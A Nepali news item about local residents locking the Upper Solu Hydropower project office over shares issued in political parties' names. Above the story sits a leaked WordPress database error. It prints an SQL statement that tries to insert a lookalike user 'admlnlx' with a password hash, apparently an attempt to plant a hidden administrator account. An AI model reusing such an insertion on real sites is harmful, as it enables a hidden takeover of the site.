WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGtdqzPVRTcYnFJ2F7O5a68TlHYmot.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:39:36', '', 'admlnlx', 'admlnlx')
७ जेठ २०७५ – सोलुखुम्बुको निर्माणाधीन अपर सोलु हाइड्रो पावरको कार्यालयमा तालाबन्दी भएको छ । सोलुदुधकुण्ड नगरपालिकाका स्थानीयले विभिन्न माग राखी कार्यालयमा तालाबन्दी गरेका हुन् । आयोजनाले जिल्लाका तीन ठूला राजनीतिक दलहरु तत्कालीन नेकपा एमाले, नेकपा माओवादी केन्द्र र नेपाली कांग्रेसको नाममा ६ करोड सेयर जारी गरेपछि स्थानीय असन्तुष्ट भएका हुन् ।
आयोजनाका जनसम्पर्क अधिकृत कैलाश थापाले भने राजनीतिक पार्टीलाई आधिकारिक रुपमा शेयर नदिएको जिकिर गर्दै संस्थापन शेयर लगानीकर्ताले चाहेको व्यक्ति वा संस्थालाई दिनसक्ने बताएका छन् ।